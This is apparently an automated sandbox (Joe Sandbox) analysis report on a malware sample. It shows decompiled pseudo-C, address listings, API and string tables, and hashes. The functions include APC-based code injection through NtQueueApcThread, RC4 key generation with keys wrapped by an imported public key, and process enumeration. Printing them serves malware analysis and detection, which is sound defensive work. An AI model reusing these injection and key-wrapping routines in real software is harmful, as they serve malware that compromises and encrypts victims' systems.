                                                                                                                                                                                                                                                                                                        					_t109 = CreateWindowExA(??, ??, ??, ??, ??, ??, ??, ??, ??, ??, ??, ??); // executed
                                                                                                                                                                                                                                                                                                        					_t157 = _t156 - 0x30;
                                                                                                                                                                                                                                                                                                        					_v32 = _t109;
                                                                                                                                                                                                                                                                                                        					if(_v32 != 0) {
                                                                                                                                                                                                                                                                                                        						_v268 = 0;
                                                                                                                                                                                                                                                                                                        						_v272 = _v32;
                                                                                                                                                                                                                                                                                                        						_v188 = 1;
                                                                                                                                                                                                                                                                                                        						_t112 = ShowWindow(??, ??); // executed
                                                                                                                                                                                                                                                                                                        						_t158 = _t157 - 8;
                                                                                                                                                                                                                                                                                                        						_v36 = 0x7c3;
                                                                                                                                                                                                                                                                                                        						_v40 = 0xe0f;
                                                                                                                                                                                                                                                                                                        						_v76 = 0;
                                                                                                                                                                                                                                                                                                        						_v80 = 0;
                                                                                                                                                                                                                                                                                                        						if((E00401E50(_t112) & 0xffffff00 | _t113 != 0x00000000) != 0) {
                                                                                                                                                                                                                                                                                                        							 *_t158 = 0xffffa883;
                                                                                                                                                                                                                                                                                                        							ExitProcess(??);
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						 *0x41a004 = 0;
                                                                                                                                                                                                                                                                                                        						 *0x41a008 = 0;
                                                                                                                                                                                                                                                                                                        						 *0x41a00c = 0;
                                                                                                                                                                                                                                                                                                        						 *0x41a014 = 0;
                                                                                                                                                                                                                                                                                                        						 *0x41a010 = 0;
                                                                                                                                                                                                                                                                                                        						 *0x41a018 = 0;
                                                                                                                                                                                                                                                                                                        						 *0x422038 = 0x17149d65;
                                                                                                                                                                                                                                                                                                        						_v276 =  &_v80;
                                                                                                                                                                                                                                                                                                        						 *_t158 = _v36;
                                                                                                                                                                                                                                                                                                        						_v188 = 1;
                                                                                                                                                                                                                                                                                                        						E00401EBB(_t149); // executed
                                                                                                                                                                                                                                                                                                        						_v276 =  &_v76;
                                                                                                                                                                                                                                                                                                        						 *_t158 = _v40; // executed
                                                                                                                                                                                                                                                                                                        						E00401EBB(_t149); // executed
                                                                                                                                                                                                                                                                                                        						_v272 = 0x18;
                                                                                                                                                                                                                                                                                                        						_v276 = 0;
                                                                                                                                                                                                                                                                                                        						 *_t158 = 0x422020;
                                                                                                                                                                                                                                                                                                        						memset(??, ??, ??);
                                                                                                                                                                                                                                                                                                        						 *0x422020 = 0;
                                                                                                                                                                                                                                                                                                        						 *0x422024 = 1;
                                                                                                                                                                                                                                                                                                        						 *0x422028 = _v76;
                                                                                                                                                                                                                                                                                                        						_v44 = _v80;
                                                                                                                                                                                                                                                                                                        						_v264 = 0;
                                                                                                                                                                                                                                                                                                        						_v268 = 0;
                                                                                                                                                                                                                                                                                                        						_v272 = 0x422020;
                                                                                                                                                                                                                                                                                                        						_v276 = _v44;
                                                                                                                                                                                                                                                                                                        						 *_t158 = 0xfffffffe; // executed
                                                                                                                                                                                                                                                                                                        						NtQueueApcThread(??, ??, ??, ??, ??); // executed
                                                                                                                                                                                                                                                                                                        						L00404F84();
                                                                                                                                                                                                                                                                                                        						UpdateWindow(_v32);
                                                                                                                                                                                                                                                                                                        						_t160 = _t158 - 0x10;
                                                                                                                                                                                                                                                                                                        						while(1) {
                                                                                                                                                                                                                                                                                                        							_v288 = 0;
                                                                                                                                                                                                                                                                                                        							_v292 = 0;
                                                                                                                                                                                                                                                                                                        							_v296 = 0;
                                                                                                                                                                                                                                                                                                        							 *_t160 =  &_v72;
                                                                                                                                                                                                                                                                                                        							_v188 = 1;
                                                                                                                                                                                                                                                                                                        							_t131 = GetMessageA(??, ??, ??, ??);
                                                                                                                                                                                                                                                                                                        							_t161 = _t160 - 0x10;
                                                                                                                                                                                                                                                                                                        							if((_t131 & 0xffffff00 | GetMessageA > 0x00000000) == 0) {
                                                                                                                                                                                                                                                                                                        								break;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							 *_t161 =  &_v72;
                                                                                                                                                                                                                                                                                                        							_v188 = 1;
                                                                                                                                                                                                                                                                                                        							TranslateMessage(??);
                                                                                                                                                                                                                                                                                                        							_t162 = _t161 - 4;
                                                                                                                                                                                                                                                                                                        							 *_t162 =  &_v72;
                                                                                                                                                                                                                                                                                                        							DispatchMessageA(??);
                                                                                                                                                                                                                                                                                                        							_t160 = _t162 - 4;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						_t139 = _v64;
                                                                                                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                                                                                                        						MessageBoxA(0, "Window Creation Failed!", "Error!", 0x1030);
                                                                                                                                                                                                                                                                                                        						_t161 = _t157 - 0x10;
                                                                                                                                                                                                                                                                                                        						_t139 = 0;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					MessageBoxA(0, "Window Registration Failed!", "Error!", 0x1030);
                                                                                                                                                                                                                                                                                                        					_t161 = _t156 - 0x10;
                                                                                                                                                                                                                                                                                                        					_t139 = 0;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				_v196 = _t139;
                                                                                                                                                                                                                                                                                                        				 *_t161 =  &_v192;
                                                                                                                                                                                                                                                                                                        				E0040E320(_t149, _t150);
                                                                                                                                                                                                                                                                                                        				return _v196;
                                                                                                                                                                                                                                                                                                        			}



















































                                                                                                                                                                                                                                                                                                        0x0040207b
                                                                                                                                                                                                                                                                                                        0x00402081
                                                                                                                                                                                                                                                                                                        0x0040208b
                                                                                                                                                                                                                                                                                                        0x00402095
                                                                                                                                                                                                                                                                                                        0x0040209b
                                                                                                                                                                                                                                                                                                        0x0040209e
                                                                                                                                                                                                                                                                                                        0x004020a0
                                                                                                                                                                                                                                                                                                        0x004020a5
                                                                                                                                                                                                                                                                                                        0x004020a8
                                                                                                                                                                                                                                                                                                        0x004020b4
                                                                                                                                                                                                                                                                                                        0x004020b9
                                                                                                                                                                                                                                                                                                        0x004020c0
                                                                                                                                                                                                                                                                                                        0x004020c7
                                                                                                                                                                                                                                                                                                        0x004020ce
                                                                                                                                                                                                                                                                                                        0x004020d5
                                                                                                                                                                                                                                                                                                        0x004020df
                                                                                                                                                                                                                                                                                                        0x004020e2
                                                                                                                                                                                                                                                                                                        0x004020ea
                                                                                                                                                                                                                                                                                                        0x004020f6
                                                                                                                                                                                                                                                                                                        0x00402105
                                                                                                                                                                                                                                                                                                        0x00402121
                                                                                                                                                                                                                                                                                                        0x00402124
                                                                                                                                                                                                                                                                                                        0x0040212b
                                                                                                                                                                                                                                                                                                        0x00402132
                                                                                                                                                                                                                                                                                                        0x0040214c
                                                                                                                                                                                                                                                                                                        0x00402151
                                                                                                                                                                                                                                                                                                        0x0040215f
                                                                                                                                                                                                                                                                                                        0x00402161
                                                                                                                                                                                                                                                                                                        0x0040216c
                                                                                                                                                                                                                                                                                                        0x004021a1
                                                                                                                                                                                                                                                                                                        0x004021ac
                                                                                                                                                                                                                                                                                                        0x004021b0
                                                                                                                                                                                                                                                                                                        0x004021b8
                                                                                                                                                                                                                                                                                                        0x004021c0
                                                                                                                                                                                                                                                                                                        0x004021c8
                                                                                                                                                                                                                                                                                                        0x004021d0
                                                                                                                                                                                                                                                                                                        0x004021d8
                                                                                                                                                                                                                                                                                                        0x004021e0
                                                                                                                                                                                                                                                                                                        0x004021e8
                                                                                                                                                                                                                                                                                                        0x004021f0
                                                                                                                                                                                                                                                                                                        0x004021f8
                                                                                                                                                                                                                                                                                                        0x00402204
                                                                                                                                                                                                                                                                                                        0x0040220e
                                                                                                                                                                                                                                                                                                        0x00402210
                                                                                                                                                                                                                                                                                                        0x00402213
                                                                                                                                                                                                                                                                                                        0x0040221a
                                                                                                                                                                                                                                                                                                        0x0040224f
                                                                                                                                                                                                                                                                                                        0x0040225a
                                                                                                                                                                                                                                                                                                        0x00402262
                                                                                                                                                                                                                                                                                                        0x0040226c
                                                                                                                                                                                                                                                                                                        0x0040226e
                                                                                                                                                                                                                                                                                                        0x00402271
                                                                                                                                                                                                                                                                                                        0x00402278
                                                                                                                                                                                                                                                                                                        0x0040227f
                                                                                                                                                                                                                                                                                                        0x00402286
                                                                                                                                                                                                                                                                                                        0x00402299
                                                                                                                                                                                                                                                                                                        0x0040229b
                                                                                                                                                                                                                                                                                                        0x004022a7
                                                                                                                                                                                                                                                                                                        0x004022a7
                                                                                                                                                                                                                                                                                                        0x004022a9
                                                                                                                                                                                                                                                                                                        0x004022b3
                                                                                                                                                                                                                                                                                                        0x004022bd
                                                                                                                                                                                                                                                                                                        0x004022c7
                                                                                                                                                                                                                                                                                                        0x004022d1
                                                                                                                                                                                                                                                                                                        0x004022db
                                                                                                                                                                                                                                                                                                        0x004022e5
                                                                                                                                                                                                                                                                                                        0x004022f2
                                                                                                                                                                                                                                                                                                        0x004022f9
                                                                                                                                                                                                                                                                                                        0x004022fc
                                                                                                                                                                                                                                                                                                        0x00402306
                                                                                                                                                                                                                                                                                                        0x0040230e
                                                                                                                                                                                                                                                                                                        0x00402315
                                                                                                                                                                                                                                                                                                        0x00402318
                                                                                                                                                                                                                                                                                                        0x0040231d
                                                                                                                                                                                                                                                                                                        0x00402325
                                                                                                                                                                                                                                                                                                        0x0040232d
                                                                                                                                                                                                                                                                                                        0x00402334
                                                                                                                                                                                                                                                                                                        0x00402339
                                                                                                                                                                                                                                                                                                        0x00402343
                                                                                                                                                                                                                                                                                                        0x00402350
                                                                                                                                                                                                                                                                                                        0x00402358
                                                                                                                                                                                                                                                                                                        0x0040235b
                                                                                                                                                                                                                                                                                                        0x00402363
                                                                                                                                                                                                                                                                                                        0x0040236b
                                                                                                                                                                                                                                                                                                        0x00402376
                                                                                                                                                                                                                                                                                                        0x0040237a
                                                                                                                                                                                                                                                                                                        0x00402381
                                                                                                                                                                                                                                                                                                        0x00402389
                                                                                                                                                                                                                                                                                                        0x00402399
                                                                                                                                                                                                                                                                                                        0x0040239b
                                                                                                                                                                                                                                                                                                        0x004023ca
                                                                                                                                                                                                                                                                                                        0x004023ca
                                                                                                                                                                                                                                                                                                        0x004023d2
                                                                                                                                                                                                                                                                                                        0x004023da
                                                                                                                                                                                                                                                                                                        0x004023e5
                                                                                                                                                                                                                                                                                                        0x004023ed
                                                                                                                                                                                                                                                                                                        0x004023f7
                                                                                                                                                                                                                                                                                                        0x004023f9
                                                                                                                                                                                                                                                                                                        0x00402403
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x004023a3
                                                                                                                                                                                                                                                                                                        0x004023ab
                                                                                                                                                                                                                                                                                                        0x004023b5
                                                                                                                                                                                                                                                                                                        0x004023b7
                                                                                                                                                                                                                                                                                                        0x004023bd
                                                                                                                                                                                                                                                                                                        0x004023c5
                                                                                                                                                                                                                                                                                                        0x004023c7
                                                                                                                                                                                                                                                                                                        0x004023c7
                                                                                                                                                                                                                                                                                                        0x00402405
                                                                                                                                                                                                                                                                                                        0x0040221c
                                                                                                                                                                                                                                                                                                        0x00402240
                                                                                                                                                                                                                                                                                                        0x00402242
                                                                                                                                                                                                                                                                                                        0x00402245
                                                                                                                                                                                                                                                                                                        0x00402245
                                                                                                                                                                                                                                                                                                        0x0040216e
                                                                                                                                                                                                                                                                                                        0x00402192
                                                                                                                                                                                                                                                                                                        0x00402194
                                                                                                                                                                                                                                                                                                        0x00402197
                                                                                                                                                                                                                                                                                                        0x00402197
                                                                                                                                                                                                                                                                                                        0x00402408
                                                                                                                                                                                                                                                                                                        0x00402431
                                                                                                                                                                                                                                                                                                        0x00402434
                                                                                                                                                                                                                                                                                                        0x00402446

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CreateIconLoadWindow
                                                                                                                                                                                                                                                                                                        • String ID: 0$Error!$File Editor Example Program$MAINMENU$Window Creation Failed!$Window Registration Failed!$WindowClass
                                                                                                                                                                                                                                                                                                        • API String ID: 1237199932-3124372322
                                                                                                                                                                                                                                                                                                        • Opcode ID: 7b10b63b767507c6481a4855463711b29b80b9f011e458724250d7178add0260
                                                                                                                                                                                                                                                                                                        • Instruction ID: 37ceb777bd878a6ae4fc1e0f4903b58b5a3b227ee6cbc29fc1c83407536e847a
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7b10b63b767507c6481a4855463711b29b80b9f011e458724250d7178add0260
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CBA1E6B09053059FDB10EF64D98878EBFF0EB44308F50852DE498AB391D7B99989CF96
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 62%
                                                                                                                                                                                                                                                                                                        			E04008800(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, BYTE* _a20, int _a24) {
                                                                                                                                                                                                                                                                                                        				int _v8;
                                                                                                                                                                                                                                                                                                        				long* _v12;
                                                                                                                                                                                                                                                                                                        				long _v16;
                                                                                                                                                                                                                                                                                                        				long* _v20;
                                                                                                                                                                                                                                                                                                        				signed int _v24;
                                                                                                                                                                                                                                                                                                        				signed int _v28;
                                                                                                                                                                                                                                                                                                        				long* _v32;
                                                                                                                                                                                                                                                                                                        				char* _t41;
                                                                                                                                                                                                                                                                                                        				int _t42;
                                                                                                                                                                                                                                                                                                        				signed int _t43;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t46;
                                                                                                                                                                                                                                                                                                        				int _t51;
                                                                                                                                                                                                                                                                                                        				char* _t71;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                                                                                                                                        				if(_a4 == 0 || _a8 == 0) {
                                                                                                                                                                                                                                                                                                        					L19:
                                                                                                                                                                                                                                                                                                        					return _v8;
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					_v12 = 0;
                                                                                                                                                                                                                                                                                                        					_t41 =  *0x4013370; // 0x400c6e4
                                                                                                                                                                                                                                                                                                        					_t42 = CryptAcquireContextA( &_v12, _t41, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
                                                                                                                                                                                                                                                                                                        					if(_t42 == 0) {
                                                                                                                                                                                                                                                                                                        						_v16 = GetLastError();
                                                                                                                                                                                                                                                                                                        						if(_v16 == 0x80090016 || _v16 == 0x8009000b) {
                                                                                                                                                                                                                                                                                                        							_t71 =  *0x4013370; // 0x400c6e4
                                                                                                                                                                                                                                                                                                        							CryptAcquireContextA( &_v12, _t71, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					if(_v12 != 0) {
                                                                                                                                                                                                                                                                                                        						_v28 = 0x80;
                                                                                                                                                                                                                                                                                                        						_v20 = 0;
                                                                                                                                                                                                                                                                                                        						_v24 = _v28 << 0x00000010 | 0x00000001;
                                                                                                                                                                                                                                                                                                        						_t43 = _v24;
                                                                                                                                                                                                                                                                                                        						__imp__CryptGenKey(_v12, 0x6801, _t43,  &_v20);
                                                                                                                                                                                                                                                                                                        						if(_t43 != 0) {
                                                                                                                                                                                                                                                                                                        							_t46 = _a4;
                                                                                                                                                                                                                                                                                                        							__imp__CryptExportKey(_v20, 0, 8, 0, _t46, _a8);
                                                                                                                                                                                                                                                                                                        							if(_t46 != 0) {
                                                                                                                                                                                                                                                                                                        								if(_a12 == 0 || _a16 == 0 || _a20 == 0 || _a24 == 0) {
                                                                                                                                                                                                                                                                                                        									_v8 = 1;
                                                                                                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                                                                                                        									_v32 = 0;
                                                                                                                                                                                                                                                                                                        									if(CryptImportKey(_v12, _a20, _a24, 0, 1,  &_v32) != 0) {
                                                                                                                                                                                                                                                                                                        										_t51 = _v20;
                                                                                                                                                                                                                                                                                                        										__imp__CryptExportKey(_t51, _v32, 1, 0, _a12, _a16); // executed
                                                                                                                                                                                                                                                                                                        										_v8 = _t51;
                                                                                                                                                                                                                                                                                                        										CryptDestroyKey(_v32);
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							CryptDestroyKey(_v20);
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						CryptReleaseContext(_v12, 0);
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					goto L19;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        			}
















                                                                                                                                                                                                                                                                                                        0x04008806
                                                                                                                                                                                                                                                                                                        0x04008811
                                                                                                                                                                                                                                                                                                        0x0400895c
                                                                                                                                                                                                                                                                                                        0x04008962
                                                                                                                                                                                                                                                                                                        0x04008821
                                                                                                                                                                                                                                                                                                        0x04008821
                                                                                                                                                                                                                                                                                                        0x04008831
                                                                                                                                                                                                                                                                                                        0x0400883b
                                                                                                                                                                                                                                                                                                        0x04008843
                                                                                                                                                                                                                                                                                                        0x0400884b
                                                                                                                                                                                                                                                                                                        0x04008855
                                                                                                                                                                                                                                                                                                        0x04008869
                                                                                                                                                                                                                                                                                                        0x04008874
                                                                                                                                                                                                                                                                                                        0x04008874
                                                                                                                                                                                                                                                                                                        0x04008855
                                                                                                                                                                                                                                                                                                        0x0400887e
                                                                                                                                                                                                                                                                                                        0x04008884
                                                                                                                                                                                                                                                                                                        0x0400888b
                                                                                                                                                                                                                                                                                                        0x0400889b
                                                                                                                                                                                                                                                                                                        0x040088a2
                                                                                                                                                                                                                                                                                                        0x040088af
                                                                                                                                                                                                                                                                                                        0x040088b7
                                                                                                                                                                                                                                                                                                        0x040088c1
                                                                                                                                                                                                                                                                                                        0x040088cf
                                                                                                                                                                                                                                                                                                        0x040088d7
                                                                                                                                                                                                                                                                                                        0x040088dd
                                                                                                                                                                                                                                                                                                        0x0400893f
                                                                                                                                                                                                                                                                                                        0x040088f1
                                                                                                                                                                                                                                                                                                        0x040088f1
                                                                                                                                                                                                                                                                                                        0x04008914
                                                                                                                                                                                                                                                                                                        0x04008926
                                                                                                                                                                                                                                                                                                        0x0400892a
                                                                                                                                                                                                                                                                                                        0x04008930
                                                                                                                                                                                                                                                                                                        0x04008937
                                                                                                                                                                                                                                                                                                        0x04008937
                                                                                                                                                                                                                                                                                                        0x0400893d
                                                                                                                                                                                                                                                                                                        0x040088dd
                                                                                                                                                                                                                                                                                                        0x0400894a
                                                                                                                                                                                                                                                                                                        0x0400894a
                                                                                                                                                                                                                                                                                                        0x04008956
                                                                                                                                                                                                                                                                                                        0x04008956
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0400887e

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,04008420,00000000,00001000,00000000), ref: 0400883B
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 04008845
                                                                                                                                                                                                                                                                                                        • CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008874
                                                                                                                                                                                                                                                                                                        • CryptGenKey.ADVAPI32(00000000,00006801,?,00000000), ref: 040088AF
                                                                                                                                                                                                                                                                                                        • CryptExportKey.ADVAPI32(00000000,00000000,00000008,00000000,00000000,00000000), ref: 040088CF
                                                                                                                                                                                                                                                                                                        • CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?), ref: 0400890C
                                                                                                                                                                                                                                                                                                        • CryptExportKey.ADVAPI32(00000000,?,00000001,00000000,00000000,00000000), ref: 0400892A
                                                                                                                                                                                                                                                                                                        • CryptDestroyKey.ADVAPI32(?), ref: 04008937
                                                                                                                                                                                                                                                                                                        • CryptDestroyKey.ADVAPI32(00000000), ref: 0400894A
                                                                                                                                                                                                                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008956
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 04008864
                                                                                                                                                                                                                                                                                                        • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 0400882C
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Crypt$Context$AcquireDestroyExport$ErrorImportLastRelease
                                                                                                                                                                                                                                                                                                        • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                                                                        • API String ID: 3052018297-947817771
                                                                                                                                                                                                                                                                                                        • Opcode ID: a3ecfbe549d6a2009873a4562b9912e0752bd3a41684449d96c4f6673af668fd
                                                                                                                                                                                                                                                                                                        • Instruction ID: e62ef6a9a3e861f5d7bfaf583d60d4f1649157d47df97182d85979e93aebb629
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a3ecfbe549d6a2009873a4562b9912e0752bd3a41684449d96c4f6673af668fd
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E641E972A00209EBFB54EF94C849BAE77B9FB44705F14C518F615B61C0C7B9AA84CF91
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 72%
                                                                                                                                                                                                                                                                                                        			E04001CA0(CHAR* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                                                        				char _v5;
                                                                                                                                                                                                                                                                                                        				char _v272;
                                                                                                                                                                                                                                                                                                        				long _v284;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v300;
                                                                                                                                                                                                                                                                                                        				void* _v308;
                                                                                                                                                                                                                                                                                                        				void* _v312;
                                                                                                                                                                                                                                                                                                        				long _v316;
                                                                                                                                                                                                                                                                                                        				long _v320;
                                                                                                                                                                                                                                                                                                        				void* _v324;
                                                                                                                                                                                                                                                                                                        				char _v328;
                                                                                                                                                                                                                                                                                                        				int _v332;
                                                                                                                                                                                                                                                                                                        				void* _t44;
                                                                                                                                                                                                                                                                                                        				int _t47;
                                                                                                                                                                                                                                                                                                        				int _t50;
                                                                                                                                                                                                                                                                                                        				void* _t61;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v5 = 0;
                                                                                                                                                                                                                                                                                                        				_t44 = CreateToolhelp32Snapshot(2, 0); // executed
                                                                                                                                                                                                                                                                                                        				_v312 = _t44;
                                                                                                                                                                                                                                                                                                        				if(_v312 == 0xffffffff) {
                                                                                                                                                                                                                                                                                                        					L18:
                                                                                                                                                                                                                                                                                                        					return _v5;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				_v308 = 0x128;
                                                                                                                                                                                                                                                                                                        				_t47 = Process32First(_v312,  &_v308); // executed
                                                                                                                                                                                                                                                                                                        				if(_t47 == 0) {
                                                                                                                                                                                                                                                                                                        					L17:
                                                                                                                                                                                                                                                                                                        					CloseHandle(_v312);
                                                                                                                                                                                                                                                                                                        					goto L18;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				_v320 = GetCurrentProcessId();
                                                                                                                                                                                                                                                                                                        				_v316 = 0;
                                                                                                                                                                                                                                                                                                        				while(_v300 != _v320) {
                                                                                                                                                                                                                                                                                                        					_t50 = Process32Next(_v312,  &_v308); // executed
                                                                                                                                                                                                                                                                                                        					if(_t50 != 0) {
                                                                                                                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					L6:
                                                                                                                                                                                                                                                                                                        					if(_v316 != 0 && Process32First(_v312,  &_v308) != 0) {
                                                                                                                                                                                                                                                                                                        						while(_v300 != _v316) {
                                                                                                                                                                                                                                                                                                        							if(Process32Next(_v312,  &_v308) != 0) {
                                                                                                                                                                                                                                                                                                        								continue;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							goto L17;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						if(lstrlenA( &_v272) < _a8) {
                                                                                                                                                                                                                                                                                                        							lstrcpyA(_a4,  &_v272);
                                                                                                                                                                                                                                                                                                        							_v324 = OpenProcess(0x410, 0, _v316);
                                                                                                                                                                                                                                                                                                        							if(_v324 != 0) {
                                                                                                                                                                                                                                                                                                        								_v332 = 0;
                                                                                                                                                                                                                                                                                                        								_push( &_v332);
                                                                                                                                                                                                                                                                                                        								_push(4);
                                                                                                                                                                                                                                                                                                        								_push( &_v328);
                                                                                                                                                                                                                                                                                                        								_t61 = _v324;
                                                                                                                                                                                                                                                                                                        								_push(_t61); // executed
                                                                                                                                                                                                                                                                                                        								L0400B1D4(); // executed
                                                                                                                                                                                                                                                                                                        								if(_t61 == 0) {
                                                                                                                                                                                                                                                                                                        									_push(_a8);
                                                                                                                                                                                                                                                                                                        									_push(_a4);
                                                                                                                                                                                                                                                                                                        									_push(_v324); // executed
                                                                                                                                                                                                                                                                                                        									L0400B1C8(); // executed
                                                                                                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                                                                                                        									_push(_a8);
                                                                                                                                                                                                                                                                                                        									_push(_a4);
                                                                                                                                                                                                                                                                                                        									_push(_v328);
                                                                                                                                                                                                                                                                                                        									_push(_v324);
                                                                                                                                                                                                                                                                                                        									L0400B1CE();
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								_v5 = 1;
                                                                                                                                                                                                                                                                                                        								FindCloseChangeNotification(_v324); // executed
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					goto L17;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				_v316 = _v284;
                                                                                                                                                                                                                                                                                                        				goto L6;
                                                                                                                                                                                                                                                                                                        			}


















                                                                                                                                                                                                                                                                                                        0x04001ca9
                                                                                                                                                                                                                                                                                                        0x04001cb1
                                                                                                                                                                                                                                                                                                        0x04001cb6
                                                                                                                                                                                                                                                                                                        0x04001cc3
                                                                                                                                                                                                                                                                                                        0x04001e51
                                                                                                                                                                                                                                                                                                        0x04001e57
                                                                                                                                                                                                                                                                                                        0x04001e57
                                                                                                                                                                                                                                                                                                        0x04001cc9
                                                                                                                                                                                                                                                                                                        0x04001ce1
                                                                                                                                                                                                                                                                                                        0x04001ce8
                                                                                                                                                                                                                                                                                                        0x04001e44
                                                                                                                                                                                                                                                                                                        0x04001e4b
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04001e4b
                                                                                                                                                                                                                                                                                                        0x04001cf4
                                                                                                                                                                                                                                                                                                        0x04001cfa
                                                                                                                                                                                                                                                                                                        0x04001d04
                                                                                                                                                                                                                                                                                                        0x04001d2e
                                                                                                                                                                                                                                                                                                        0x04001d35
